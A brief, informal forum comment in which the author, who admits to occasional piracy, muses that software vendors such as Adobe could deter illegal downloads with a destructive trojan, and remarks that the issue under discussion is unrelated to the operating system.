I often thought Adobe and the other popular hack targets should take an approach like this to discourage illegal dling, even though I don't care if they do or not, as I'm also a pirate from time to time. It would be the best way to thwart, if there were direct consequences, like a trojan that trashed the pirate machine. But this is totally displaced here, not that it's Adobe or Apple doing it.
And this has nothing to do with the OS, btw. Not that I care about that either.
Idiots Simply Buy Everything (Not)